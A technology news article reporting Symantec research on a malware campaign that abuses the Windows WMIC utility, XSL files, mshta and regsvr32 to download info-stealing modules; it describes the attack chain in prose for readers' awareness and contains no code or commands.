Windows utility used by malware in new information theft campaigns

WMIC-based payloads highlight how attackers are turning to innocuous system processes to compromise Windows machines.
Written by Charlie Osborne, Contributing Writer

Researchers have uncovered a new attack chain which exploits little-known Microsoft Windows utilities and innocuous software to fly under the radar in the quest to steal data.

According to Symantec, the new malware campaign is a prime example of what the company calls "living off the land."

In other words, attackers are now turning to the resources already available on target machines -- including legitimate tools and processes -- as well as running simple scripts and shellcode in memory and performing fileless attacks.

By focusing more on homegrown software and less on introducing foreign malware into target systems, threat actors can remain undetected for longer and minimize the risk of being exposed.

A new attack chain takes this technique to heart.

Symantec noticed the campaign, which has been recently discovered, utilizes a tool found on all Microsoft Windows machines called the Windows Management Instrumentation Command-line (WMIC) utility.

This legitimate process provides a command-line interface for the Windows Management Interface (WMI). WMI is used for administrative tasks on both local and remote systems and can be used to query system settings, control processes, and execute scripts.

TechRepublic: How to block ad trackers from following you on Firefox

Together with eXtensible Stylesheet Language (XSL) files, the two combined are being exploited as part of a multi-stage infection chain to steal information covertly from Windows machines.

The attack chain begins with a phishing campaign containing a shortcut link delivered via a URL. If a victim clicks on the malicious link, the shortcut file -- which contains a WMIC command -- downloads a malicious XSL file from a remote server.

The XSL file contains JavaScript which is executed through the use of mshta.exe, a legitimate Windows process used to run the Microsoft HTML Application Host.

CNET: US and intelligence allies take aim at tech companies over encryption

The JavaScript, however, is not so innocent. In total, the JavaScript contains a list of 52 domains used to randomly generate a domain and port number in order to download HTML Application (HTA) files and three DLLs, which are then registered to regsvr32.exe, as well as the main payload.

Additional modules are then downloaded, leading to the compromise of the victim's PC.

The payload includes a number of modules suitable for information theft, including the MailPassview utility for email password capture; WebBrowser Passview software for harvesting web browser credentials, a keylogger, backdoor for persistence, and a file browser for viewing and exfiltrating files.

"The use of WMI by cybercriminals is not new, however, the tool is typically used for propagation but in this case is used to download a malicious file," Symantec says. "The use of WMIC is beneficial for the attackers as it helps them to remain inconspicuous and also provides them with a powerful tool to aid them in their activities."

Comparisons can be drawn between WMI and PowerShell, another legitimate service which is being continually targeted by threat actors seeking to compromise Windows machines.

See also: Android 'API breaking' vulnerability leaks device data, allows user tracking

In January, researchers from FireEye said vulnerabilities are being exploited in Microsoft Office to spread info-stealing malware which is also capable of cryptocurrency mining and launching denial-of-service (DDoS) attacks.

Vulnerabilities exploited through the campaign use PowerShell to drop malware payloads into vulnerable systems.

15 amazing tech gadgets you need for your home office

Previous and related coverage

Editorial standards